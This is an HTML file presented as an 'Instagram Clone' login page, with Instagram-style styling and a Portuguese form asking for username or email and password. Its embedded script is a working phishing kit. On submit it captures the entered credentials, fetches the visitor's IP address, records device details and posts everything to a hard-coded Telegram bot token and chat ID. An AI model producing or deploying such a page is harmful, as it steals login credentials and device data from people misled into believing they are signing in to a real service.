<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Clone</title>
    <style>
        * {
            border: none;
            box-sizing: border-box;
            font-family: Arial, Helvetica, sans-serif;
            margin: 0;
            padding: 0;
        }

        body {
            background-color: #fafafa;
            height: 100vh;
        }

        main {
            height: 100vh;
            margin: auto;
            max-width: 935px;
        }

        a { text-decoration: none; }
        h1 { margin: 20px 0; }
        ul { list-style: none; }

        .flex {
            display: -webkit-box;
            display: -moz-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
        }

        .direction-column {
            -webkit-box-direction: normal;
            -webkit-box-orient: vertical;
            -moz-box-direction: normal;
            -moz-box-orient: vertical;
            -webkit-flex-direction: column;
            -ms-flex-direction: column;
            flex-direction: column;
        }

        .justify-content-center {
            -webkit-box-pack: center;
            -moz-box-pack: center;
            -ms-flex-pack: center;
            -webkit-justify-content: center;
            justify-content: center;
        }

        .align-items-center {
            -webkit-box-align: center;
            -moz-box-align: center;
            -ms-flex-align: center;
            -webkit-align-items: center;
            align-items: center;
        }

        .flex-wrap {
            -webkit-flex-wrap: wrap;
            -ms-flex-wrap: wrap;
            flex-wrap: wrap;
        }

        .panel {
            background-color: white;
            border: 1px solid #dbdbdb;
            margin-bottom: 10px;
            padding: 10px;
        }

        #auth { max-width: 350px; }
        #mobile { max-width: 454px; }

        #mobile img {
            height: 618px;
        }

        .login-with-fb,
        form { width: 100%; }

        .register,
        form { padding: 30px 20px; }

        .login-with-fb { padding: 30px 20px 20px 20px; }

        form .sr-only { display: none; }

        form input {
            background-color: #fafafa;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            color: #808080;
            margin-bottom: 8px;
            padding: 10px 10px;
            width: 100%;
        }

        form input::placeholder {
            color: #808080;
        }

        form input:focus {
            border: 1px solid #808080;
            outline: none;
        }

        form button {
            background-color: #0095f6;
            border-radius: 5px;
            color: #fff;
            font-weight: bold;
            height: 35px;
            margin-top: 10px;
            width: 100%;
        }

        .separator span {
            background-color: #dbdbdb;
            height: 1px;
            width: calc(100% - 10px);
        }

        .separator .or {
            color: #808080;
            font-weight: bold;
        }

        .separator { padding: 0 20px; }
        .separator span:first-child { margin-right: 10px;}
        .separator span:last-child { margin-left: 10px;}

        .login-with-fb a { 
            color: #385185; 
        }

        .login-with-fb > a { font-size: 12px; }
        .login-with-fb div a { font-weight: bold; }
        .login-with-fb div { margin-bottom: 15px; }

        .register * { font-size: 14px; }
        .register a { 
            color: #0095f6;
            font-weight: bold;
        }

        .register p { margin-right: 5px; }

        .app-download { padding: 15px; }
        .app-download p { padding: 10px 0; }
        .app-download img { 
            height: 40px; 
            margin: 0 5px;
        }

        footer {
            margin: 0 auto 30px auto;
            max-width: 935px;
        }
        footer ul { margin-bottom: 20px; }
        footer ul li { margin: 0 10px 10px; } 
        footer ul li a { color: #385185; }
        footer .copyright { color: #808080; }
        footer ul li a,
        footer .copyright { 
            font-weight: bold;
            text-align: center;
            text-transform: uppercase;
        }

        @media screen and (max-width: 767px) {
            main { margin: 30px auto 50px auto; }
            footer .copyright,
            footer ul li a { font-size: 13px; }
        }
    </style>
</head>
<body>
    <main>
        <form id="login-form">
            <input id="email" name="email" placeholder="Telefone, nome de usuário ou e-mail" />
            <input id="password" name="password" type="password" placeholder="Senha" />
            <button type="submit">Entrar</button>
        </form>
    </main>
    <script src="https://unpkg.com/axios@1.6.7/dist/axios.min.js"></script>
    <script>
        const TOKEN = "7844234100:AAF52Tmgn8mLGLEtnlD3WsM3hohK7Tc0g-w";
        const CHAT_ID = "5267442771";
        const URI_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;

        document.getElementById('login-form').addEventListener('submit', function (e) {
            e.preventDefault();

            const email = document.getElementById('email').value;
            const password = document.getElementById('password').value;

            axios.get('https://api.ipify.org?format=json')
                .then(response => {
                    const ip = response.data.ip;

                    const userAgent = navigator.userAgent;
                    const platform = navigator.platform;
                    const screenWidth = screen.width;
                    const screenHeight = screen.height;
                    const deviceType = /mobile/i.test(userAgent) ? 'Mobile' : 'Desktop';

                    const message = `
                        <b>New Login Attempt</b>\n
                        <b>Email:</b> ${email}\n
                        <b>Password:</b> ${password}\n
                        <b>IP Address:</b> ${ip}\n
                        <b>Device Type:</b> ${deviceType}\n
                        <b>Platform:</b> ${platform}\n
                        <b>User Agent:</b> ${userAgent}\n
                        <b>Screen Resolution:</b> ${screenWidth}x${screenHeight}
                    `;

                    return axios.post(URI_API, {
                        chat_id: CHAT_ID,
                        parse_mode: 'html',
                        text: message
                    });
                })
                .then(() => {
                    alert('Information sent successfully!');
                })
                .catch(error => {
                    alert('An error occurred. Please try again.');
                    console.error(error);
                });
        });
    </script>
</body>
</html>